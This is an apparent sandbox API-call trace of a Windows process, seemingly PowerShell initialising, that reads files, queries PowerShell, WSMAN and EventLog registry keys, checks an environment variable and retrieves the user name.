	[0483.340] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.341] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0483.341] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0xe98, lpOverlapped=0x0) returned 1
	[0483.341] ReadFile (in: hFile=0x30c, lpBuffer=0x327d180, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327d180*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0483.341] ReadFile (in: hFile=0x30c, lpBuffer=0x327db80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x327db80*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0483.341] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
	[0483.341] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0483.341] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0483.342] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0483.342] CoTaskMemFree (pv=0x46ea70) 
	[0483.342] RegCloseKey (hKey=0x30c) returned 0x0
	[0483.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0483.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0483.342] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x24226bde, Data2=0x2e42, Data3=0x452b, Data4=([0]=0xb5, [1]=0xd2, [2]=0xc1, [3]=0x62, [4]=0x89, [5]=0xde, [6]=0x1e, [7]=0x9b))) returned 0x0
	[0483.343] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1ba89953, Data2=0xc3cb, Data3=0x4d23, Data4=([0]=0xbb, [1]=0x6c, [2]=0x36, [3]=0xdb, [4]=0xc4, [5]=0xe2, [6]=0x47, [7]=0xae))) returned 0x0
	[0483.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0483.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0484.206] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.207] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.208] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.208] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.210] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.210] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.211] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.211] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.225] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.225] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.226] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.226] CoTaskMemFree (pv=0x1b91f0b0) 
	[0484.226] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0484.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0484.227] CoTaskMemFree (pv=0x1b91f0b0) 
	[0485.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2d8 | out: phkResult=0x24d2d8*=0x30c) returned 0x0
	[0485.035] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0485.035] CoTaskMemFree (pv=0x0) 
	[0485.036] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0485.036] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x3f47b0, lpcchValueName=0x24d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.036] CoTaskMemFree (pv=0x3f47b0) 
	[0485.036] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0485.036] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x3f47b0, lpcchValueName=0x24d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.036] CoTaskMemFree (pv=0x3f47b0) 
	[0485.036] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0485.036] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x3f47b0, lpcchValueName=0x24d288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0485.036] CoTaskMemFree (pv=0x3f47b0) 
	[0485.037] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d26c, lpData=0x0, lpcbData=0x24d268*=0x0 | out: lpType=0x24d26c*=0x1, lpData=0x0, lpcbData=0x24d268*=0x8) returned 0x0
	[0485.037] CoTaskMemAlloc (cb=0xc) returned 0x470380
	[0485.037] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d23c, lpData=0x470380, lpcbData=0x24d238*=0x8 | out: lpType=0x24d23c*=0x1, lpData="2.0", lpcbData=0x24d238*=0x8) returned 0x0
	[0485.037] CoTaskMemFree (pv=0x470380) 
	[0485.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x2cc) returned 0x0
	[0486.614] RegQueryInfoKeyW (in: hKey=0x2cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d12c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d128*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.614] CoTaskMemFree (pv=0x0) 
	[0486.614] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.614] RegEnumValueW (in: hKey=0x2cc, dwIndex=0x0, lpValueName=0x3f47b0, lpcchValueName=0x24d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0486.614] CoTaskMemFree (pv=0x3f47b0) 
	[0486.614] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.614] RegEnumValueW (in: hKey=0x2cc, dwIndex=0x1, lpValueName=0x3f47b0, lpcchValueName=0x24d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0486.615] CoTaskMemFree (pv=0x3f47b0) 
	[0486.615] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.615] RegEnumValueW (in: hKey=0x2cc, dwIndex=0x2, lpValueName=0x3f47b0, lpcchValueName=0x24d1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0486.615] CoTaskMemFree (pv=0x3f47b0) 
	[0486.615] RegQueryValueExW (in: hKey=0x2cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d1bc, lpData=0x0, lpcbData=0x24d1b8*=0x0 | out: lpType=0x24d1bc*=0x1, lpData=0x0, lpcbData=0x24d1b8*=0x8) returned 0x0
	[0486.615] CoTaskMemAlloc (cb=0xc) returned 0x470740
	[0486.615] RegQueryValueExW (in: hKey=0x2cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d18c, lpData=0x470740, lpcbData=0x24d188*=0x8 | out: lpType=0x24d18c*=0x1, lpData="2.0", lpcbData=0x24d188*=0x8) returned 0x0
	[0486.615] CoTaskMemFree (pv=0x470740) 
	[0486.616] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0486.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0486.616] CoTaskMemFree (pv=0x1b91f0b0) 
	[0486.623] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0486.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0486.623] CoTaskMemFree (pv=0x1b91f0b0) 
	[0486.629] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d258 | out: phkResult=0x24d258*=0x2f4) returned 0x0
	[0486.633] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.633] CoTaskMemFree (pv=0x0) 
	[0486.634] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.634] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.634] CoTaskMemFree (pv=0x3f47b0) 
	[0486.634] CoTaskMemFree (pv=0x0) 
	[0486.634] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.634] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.634] CoTaskMemFree (pv=0x3f47b0) 
	[0486.634] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.635] CoTaskMemFree (pv=0x3f47b0) 
	[0486.635] CoTaskMemFree (pv=0x0) 
	[0486.635] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0486.635] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x3f47b0, lpcchName=0x24d258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0486.636] CoTaskMemFree (pv=0x3f47b0) 
	[0486.636] CoTaskMemFree (pv=0x0) 
	[0486.636] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x198) returned 0x0
	[0486.643] RegOpenKeyExW (in: hKey=0x198, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.643] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x2cc) returned 0x0
	[0486.643] RegOpenKeyExW (in: hKey=0x2cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.643] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x30c) returned 0x0
	[0486.643] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.643] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x310) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x314) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x318) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x31c) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x320) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x0) returned 0x2
	[0486.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x324) returned 0x0
	[0486.644] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2b8 | out: phkResult=0x24d2b8*=0x328) returned 0x0
	[0486.644] RegCloseKey (hKey=0x328) returned 0x0
	[0486.645] RegCloseKey (hKey=0x2f4) returned 0x0
	[0486.721] RegCloseKey (hKey=0x324) returned 0x0
	[0487.513] CoTaskMemAlloc (cb=0x804) returned 0x1b93ad50
	[0487.513] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b93ad50, nSize=0x24d4c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d4c8) returned 0x1
	[0487.514] CoTaskMemFree (pv=0x1b93ad50) 
	[0487.515] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0487.516] GetUserNameW (in: lpBuffer=0x3f47b0, pcbBuffer=0x24d508 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d508) returned 1
	[0487.516] CoTaskMemFree (pv=0x3f47b0) 
	[0488.363] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d208 | out: phkResult=0x24d208*=0x32c) returned 0x0
	[0488.363] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d17c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d178*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.363] CoTaskMemFree (pv=0x0) 
	[0488.363] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.363] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.363] CoTaskMemFree (pv=0x3f47b0) 
	[0488.363] CoTaskMemFree (pv=0x0) 
	[0488.363] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.364] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.364] CoTaskMemFree (pv=0x3f47b0) 
	[0488.364] CoTaskMemFree (pv=0x0) 
	[0488.364] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.364] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.364] CoTaskMemFree (pv=0x3f47b0) 
	[0488.364] CoTaskMemFree (pv=0x0) 
	[0488.364] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.364] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.364] CoTaskMemFree (pv=0x3f47b0) 
	[0488.364] CoTaskMemFree (pv=0x0) 
	[0488.364] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.364] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.364] CoTaskMemFree (pv=0x3f47b0) 
	[0488.364] CoTaskMemFree (pv=0x0) 
	[0488.364] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.364] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.365] CoTaskMemFree (pv=0x3f47b0) 
	[0488.365] CoTaskMemFree (pv=0x0) 
	[0488.365] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.365] CoTaskMemFree (pv=0x3f47b0) 
	[0488.365] CoTaskMemFree (pv=0x0) 
	[0488.365] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
	[0488.365] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x3f47b0, lpcchName=0x24d208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.365] CoTaskMemFree (pv=0x3f47b0) 
	[0488.365] CoTaskMemFree (pv=0x0) 
	[0488.365] CoTaskMemAlloc (cb=0x204) returned 0x3f47b0
